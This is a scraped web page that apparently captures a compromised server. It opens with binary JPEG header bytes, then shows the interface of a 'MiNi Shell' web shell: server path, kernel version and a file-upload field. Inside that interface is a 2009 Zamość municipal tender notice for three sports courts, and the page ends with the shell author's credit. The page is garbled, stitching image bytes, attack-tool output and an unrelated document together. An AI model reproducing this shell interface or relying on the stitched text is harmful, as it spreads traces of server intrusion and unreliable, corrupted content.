JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090313/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090313/60974-N-2009.html

<p class="kh_header"><b>Zamość: Zagospodarowanie terenu wzdłuż rzeki Łabuńki w Zamościu na odcinku od ul. Lipskiej do ul. Weteranów obejmujące budowę 3 sztuk boisk sportowych (etap II)</b><br>
<b>Numer ogłoszenia: 60974 - 2009; data zamieszczenia: 13.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Zamość , Rynek Wielki 13, 22-400 Zamość, woj. lubelskie, tel. 084 6392084, faks 084 6393054.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zamosc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zagospodarowanie terenu wzdłuż rzeki Łabuńki w Zamościu na odcinku od ul. Lipskiej do ul. Weteranów obejmujące budowę 3 sztuk boisk sportowych (etap II).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane związane z zagospodarowaniem terenu wzdłuż rzeki Łabuńki w Zamościu na odcinku od ul. Lipskiej do ul. Weteranów tj. budowa     3 sztuk boisk sportowych (II etap):
1) budowa boiska do siatkówki o wymiarach 12x22m (pow. 264m2)                          o nawierzchni nieprzepuszczalnej (poliuretanowej) obejmuje:
- mechaniczne profilowanie i zagęszczenie podłoża w gr.III kat.,
- wykonanie warstwy odsączającej z piasku średnioziarnistego grub. 20,0cm, 
- ułożenie warstwy z kruszywa łamanego 0,075-63mm, grubość warstwy po zagęszczeniu grubość12cm,
- ułożenie warstwy z kruszywa łamanego 0,075-31,5mm, grubość warstwy po zagęszczeniu grubość 15cm
- ułożenie warstwy z kruszywa łamanego 0,075-31,5mm, grubość warstwy po zagęszczeniu grubość 6cm
- ułożenie warstwy dolnej podbudowy z mieszanki mineralno - bitumicznej                    o uziarnieniu 0-16mm, grub. 4cm,
- ułożenie warstwy górnej podbudowy warstwy mineralno - bitumicznej                        o uziarnieniu 0-12,8mm, grub. 3cm
- nawierzchnia poliuretanowa typu Conipur - SP 13mm, baza z granulatu gumowego 11mm, powleczona natryskowo barwionym poliuretanem z granulatem gumowym      o grub. 2mm, linie boiska w kolorze białym/żółtym/niebieskim
- nawierzchnia z kostki betonowej koloru szarego grubości 6,0cm na podsypce cementowo piaskowej grub. 3,0cm
- konstrukcja nawierzchni i podbudowy ograniczona obrzeżami betonowymi 20x6 cm      i 30x8cm,
- słupki do siatkówki aluminiowe z regulacją wysokości mocowania siatki montowane w tulejach, siatka do siatkówki,
- ławki parkowe z prefabrykatów żelbetonowych, siedzenie z drewna (4 szt.)
- kosz na śmieci z prefabrykatów żelbetonowych (1 szt.) 
2) budowa boiska do koszykówki o wymiarach 28x16m (pow. 448m2)                           o nawierzchni nieprzepuszczalnej (poliuretanowej) obejmuje:
- mechaniczne profilowanie i zagęszczanie podłoża w gr.III kat.
- wykonanie warstwy odsączającej z piasku średnioziarnistego grub. 20,0cm
- wykonanie warstwy odsączającej z piasku średnioziarnistego grub. 10,0cm
- warstwa z kruszywa łamanego 0,075-63 mm, grub. warstwy po zagęszczeniu 12,0cm (boisko)
- warstwa z kruszywa łamanego 0,075-31,5 mm, grub. warstwy po zagęszczeniu 6,0cm 
- warstwa z kruszywa łamanego 0,075-63 mm, grub. warstwy po zagęszczeniu 15,0cm 
- wyrównanie istniejącej podbudowy mieszanką mineralno-asfaltową frakcji 0/16mm grub. 4,0 (warstwa dolna)
- wyrównanie istniejącej podbudowy mieszanką mineralno-asfaltową frakcji 0/12mm grub. 3,0 (warstwa górna)
- nawierzchnia poliuretanowa Conipur SP, 13mm, baza z granulatu gumowego 11mm powleczona natryskowo barwionym poliuretanem z granulatem gumowym o grubości 2mm. Linie boiska w kolorze biało/żółto/niebieskim
- nawierzchnia z kostki betonowej koloru szarego grub. 6cm na podsypce cementowo-piaskowej grub. 3,0cm
- obrzeża betonowe 20x6cm i 30x8cm na podsypce piaskowej
- zestaw do koszykówki: stojak stalowy jednosłupowy malowany, montowany             w tulejach o zasięgu 160cm, tablica 180x105cm laminowana, obręcz uchylna, siateczka do obręczy
- ławki parkowe z prefabrykatów żelbetonowych, siedzenie z drewna (6 szt.)
- kosz na śmieci z prefabrykatów żelbetonowych (1 szt.)
3) budowa boiska do tenisa ziemnego o wym. 36x16,90 o pow. 608,4m2,                       o nawierzchni przepuszczalnej (trawa syntetyczna) na zdrenowanym podłożu obejmuje:
- drenowanie wyk. koparkami 0,25m3 w gr.III kat. z ręcznym układaniem rurek drenarskich z otuliną z włókna syntetycznego 50mm (sączki)
- drenowanie wyk. koparkami 0,25m3 w gr.III kat. z ręcznym układaniem rurek drenarskich z otuliną z włókna syntetycznego 113mm (zbieracz) 
- odprowadzanie wody z drenażu do rzeki - rura 160mm
- studnia drenarska rewizyjno-napowietrzająca 315mm typu Wavin z pokrywą żeliwną A15
- studnia drenarska z kinetą przepływową 315mm typu Wavin z pokrywą żeliwną A15
- studnia z osadnikiem typu Tegra 1000 z żelbetonową płytą stropową
- umocnienie ścieków na skarpie korytkami żelbetonowymi trapezowymi
- zakończenie wylotu drenażu prefabrykatem żelbetonowym
- mechaniczne profilowanie i zagęszczanie podłoża w gr.III kat.
- wykonanie warstwy odsączającej z piasku średnioziarnistego grub. 10,0cm
- warstwa z kruszywa łamanego frakcji 0,075-31,5mm i grub. 6mm
- warstwa z kruszywa łamanego frakcji 0,075-63mm, grub. warstwy                              po zagęszczeniu 12,0mm (boisko)
- warstwa z kruszywa łamanego frakcji 0,075-63mm, grub. warstwy                             po zagęszczeniu 15,0mm (boisko)
- wykonanie warstwy z miału kamiennego zagęszczonej mechanicznie grub. 4,0cm
- nawierzchnia z kostki betonowej koloru szarego grub. 6,0cm na podsypce cementowo-piaskowej grub. 3,0cm
- nawierzchnia z kostki betonowej kolorowej grub. 6,0cm na podsypce cementowo-piaskowej grub. 3,0cm
- wykonanie nawierzchni z trawy syntetycznej o wysokości 20mm o ciężarze min.2300g/m2 koloru ceglastego i wypełnionej piaskiem kwarcowym
- wykonanie nawierzchni z trawy syntetycznej o wysokości 20mm o ciężarze min.2300g/m2 koloru zielonego i wypełnionej piaskiem kwarcowym
- obrzeża betonowe 20x6cm i 30x8cm na podsypce piaskowej
- ogrodzenie z siatki powlekanej polietylenem mrozoodpornym o oczku 40x40mm        w kolorze zielonym, wysokości 3,50m, na słupkach stalowych z profilu 70x70x3mm    i długości 4,30m -szt. 36, na fundamentach z betonu B-15 o wym. 40x40x80cm          i podsypce piaskowej 30cm. Brama stalowa dwuskrzydłowa o wymiarach 2,50x2,50    i furtka stalowa jednoskrzydłowa o wym. 1,20x2,50
- zestaw wyposażenia do tenisa ziemnego osadzany w tulejach (słupki aluminiowe, siatka, taśma środkowa, podpórki singlowe)
- ławki parkowe z prefabrykatów żelbetonowych, siedzenie z drewna (6 szt.)
- kosz na śmieci z prefabrykatów żelbetonowych (1 szt.)
Szczegółowy opis wykonania robót zawarty jest w projekcie budowlanym, przedmiarach robót, specyfikacjach technicznych wykonania i odbioru robót budowlanych stanowiących załączniki do SIWZ, Polskich Normach lub aprobatach technicznych, warunkach technicznych wykonawstwa i odbioru robót.

Lokalizacja: Roboty będą wykonywane wzdłuż rzeki Łabuńki od ul. Lipskiej  w kierunku  ul. Weteranów w Zamościu..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.91-4, 45.10.00.00-8, 45.21.22.00-8, 45.21.22.21-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 01.06.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień
2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym        i osobami zdolnymi do wykonania przedmiotu zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia (wykażą, że dysponują lub będą dysponować kierownikiem budowy, który posiada uprawnienia budowlane do kierowania robotami budowlanymi             o specjalności konstrukcyjno budowlanej w zakresie niezbędnym do wykonania przedmiotu zamówienia oraz aktualne zaświadczenie o przynależności do właściwej izby samorządu zawodowego)
3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia
4)nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie  art. 24 pzp. 
5) wykonawca winien być firmą, osobą fizyczną lub konsorcjum firm zarejestrowanych, zdolnym do wykonania usług  określonych w siwz,
6) wykonawca wykonał w okresie ostatnich 5 lat przed dniem wszczęcia postępowania,           a jeżeli okres prowadzenia jest krótszy - w tym okresie - roboty  podobne do przedmiotu zamówienia tj. co najmniej jedno boisko o nawierzchni poliuretanowej oraz co najmniej jedno boisko o nawierzchni z trawy syntetycznej,  o wartości co najmniej 300 000 zł.
Przez podobne rozumie się roboty odpowiadające swoim rodzajem  i wartościom robót stanowiących  przedmiot zamówienia .
7) wykonawca musi posiadać ubezpieczenie lub inny dokument potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na  wartość co najmniej  300.000 zł,
8) wykonawca nie może zalegać z opłacaniem podatków, opłat oraz składek na ubezpieczenia zdrowotne i społeczne  odpowiednio na rzecz Urzędu Skarbowego oraz Zakładu Ubezpieczeń Społecznych (lub KRUS).

W celu potwierdzenia spełnienia warunków Wykonawca musi załączyć do oferty dokumenty wymagane w pkt VI SIWZ, na podstawie których zostanie dokonana ocena..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oświadczenia i dokumenty wymagane:
1. formularz ofertowy wraz z kosztorysem -  załącznik nr 1 do SIWZ,
2. oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu                        o udzielenie zamówienia publicznego - załącznik nr 2,
3. aktualny odpis z właściwego rejestru albo aktualny zaświadczenie o wpisie                      do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej 6 miesięcy przed upływem terminu składania ofert,
4. aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, 
5. dokumenty potwierdzające uprawnienie osób podpisujących ofertę, o ile nie wynikają        z przepisów prawa lub innych dokumentów rejestrowych,
6. wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych  do wykonywania zamówienia, a także zakresu wykonywanych przez nie czynności z wykorzystaniem wzoru - załącznik   nr 3 do SIWZ,
Do wykazu należy dołączyć pisemne zobowiązanie innych podmiotów do udostępnienia osób, zdolnych do wykonania zamówienia,  jeżeli w  w/w wykazie wykonawca wskazał osoby, którymi będzie dysponował w wykonywaniu zamówienia.
7. wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, jakimi dysponuje lub będzie dysponował wykonawca, z wykorzystaniem wzoru - załącznik nr 4 do SIWZ. 
     Do wykazu należy dołączyć pisemne zobowiązanie innych podmiotów do udostępnienia    
     niezbędnych do wykonania narzędzi i urządzeń, jeżeli w ww. wykazie wykonawca     
     wskazał  narzędzia i urządzenia, którymi będzie dysponował w wykonywaniu zamówienia.
8. wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również     
     wykonywanych robót w okresie ostatnich pięciu lat przed dniem wszczęcia         
     postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności   
     jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością 
     robotom stanowiącym przedmiot zamówienia tj. co najmniej jedno boisko                  
     o nawierzchni poliuretanowej oraz co najmniej jedno boisko o nawierzchni z trawy    
     syntetycznej, o wartości co najmniej 300 000 zł z podaniem ich wartości oraz daty                
     i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały     
    wykonane należycie - min. jedno zadanie o wartości co najmniej 300 000 zł,                              
    z  wykorzystaniem wzoru - załącznik nr 5 do SIWZ,
9. dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane uprawnienia branży ogólnobudowlanej, drogowej, wodnokanalizacyjnej, w tym: 
- kierownik budowy który posiada uprawnienia budowlane do kierowania robotami budowlanymi o specjalności konstrukcyjno-budowlanej w zakresie niezbędnym          do wykonania przedmiotu zamówienia oraz specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych  i kanalizacyjnych
oraz aktualne zaświadczenie o przynależności do właściwej izby samorządu zawodowego,
10. polisę, a w przypadku jej braku, innego dokumentu potwierdzającego,                              że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na wartość co najmniej 300 000 zł,
11. oświadczenie o części zamówienia, której wykonanie Wykonawca zamierza    
      powierzyć podwykonawcom - załącznik nr 7 do SIWZ
12. Materiały na boisko z nawierzchnią poliuretanową oraz na boisko z syntetyczną trawą powinny posiadać:
- certyfikat IAAF lub deklaracja zgodności z normą PN-EN 14877 (PN-EN 15330-1), lub aprobata techniczna ITB, lub rekomendacja techniczna ITB, lub wynik badania specjalistycznego laboratorium badającego nawierzchnie sportowe lub dokument równoważny, lub badania na zawartość pierwiastków niebezpiecznych
- karta techniczna oferowanej nawierzchni potwierdzona przez jej producenta
- atest PZH dla oferowanej nawierzchni
- autoryzacja producenta nawierzchni poliuretanowej wystawiona dla wykonawcy na realizowaną inwestycję wraz z potwierdzeniem gwarancji (nie krócej niż 60 miesięcy) udzielonej przez producenta na tę nawierzchnię

W przypadku oferty Konsorcjum, każdy z członków Konsorcjum powinien złożyć dokumenty wymienione w pkt 3 i 4 oraz oświadczenie z art. 24 ust. 1 i 2 Pzp. Pozostałe dokumenty oraz oświadczenie z art. 22 ust. 1 Pzp członkowie Konsorcjum mogą złożyć razem lub oddzielnie.
W przypadku spółki cywilnej - umowa spółki cywilnej określająca osoby uprawnione do reprezentowania.
     Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej:
     Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 3 i 4 - składa dokument lub dokumenty, wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości (wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert),
b) nie orzeczono wobec niego zakazu ubiegania się o zamówienie (wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert),
c) nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu (wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert).
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się powyższych dokumentów oraz informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.
	Wyżej wymienione dokumenty są składane w formie oryginałów lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę. W przypadku  wykonawców ubiegających się wspólnie o udzielenie zamówienia, każdy z nich przedkłada wszystkie dokumenty                i oświadczenia..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.zamosc.um.gov.pl..<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację można także odebrać nieodpłatnie w siedzibie Zamawiającego: 
Urząd Miasta Zamość, Rynek Wielki 13, pokój nr 4..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.04.2009 godzina 11:00, miejsce: Urząd Miasta Zamość 
   Sekretariat Prezydenta Miasta Zamość pokój nr 7
   22-400 Zamość, Rynek Wielki 13.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Miejsce i termin otwarcia ofert:
   Urząd Miasta Zamość 
      Wydział Gospodarki Mieszkaniowej, Ochrony Środowiska i Infrastruktury Komunalnej
    Rynek Wielki 3,  22-400  Zamość
    pokój nr 10 w dniu 8 kwietnia 2009 r. o godz.12:00.         
   Osoby upoważnione ze strony Zamawiającego do kontaktowania się z wykonawcami: 
   Pani Małgorzata Strzępek  - w zakresie procedury przetargowej tel. (084) 677-23-50,

Creat By MiNi SheLL
Email: jattceo@gmail.com